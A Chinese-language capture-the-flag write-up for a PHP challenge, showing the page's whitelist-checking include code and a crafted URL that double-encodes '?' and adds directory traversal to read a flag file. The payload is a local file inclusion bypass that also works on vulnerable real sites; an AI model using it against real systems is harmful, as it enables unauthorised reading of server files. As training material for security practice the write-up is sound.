warm
来到题目,一来就是一个表情包
在这里插入图片描述
啥也不说,直接查看源代码
看见source.php的提示,直接加入url进行访问
得到一段代码:
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
代码的具体意思就是:
白名单包含source.php和hint.php两个文件
$page变量不能为空,而且也必须为字符串
$page变量属于白名单,也就是必须包含有source.php或者hint.php
对$page中第一个"?"之前的内容进行截取,并对其进行是否属于白名单的判断
对$page进行url解码,再次判断是否有"?"字符串,再次进行截取并判断
最后对传入file属性进行判断,不能为空,必须是字符串,?之前的属性必须被白名单包含。
最后,再去读一读这个hint.php
找到文件名ffffllllaaaagggg
最后的最后就是构造url传入file参数,查询ffffllllaaaagggg文件内容
url开头必须为sorce.php或hint.php开头
其中对"?"进行截断,导致?之后get传递的参数不可用
对url有一次decode即加上服务器上传的解码,一共两次,要显现“?”必须对其进行两次转码
“?”之后就是传入的文件名(注意:需要同时加上文件的位置)
因为网站目录一般是/var/www/html,所以文件名前至少加上四个“…/”可以找到根目录
成型的url(“?”两次转码之后为“%253f”):
https://ip/?file=hint.php%253f/../../../../../../../../ffffllllaaaagggg
flag:
扫一扫
1670
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
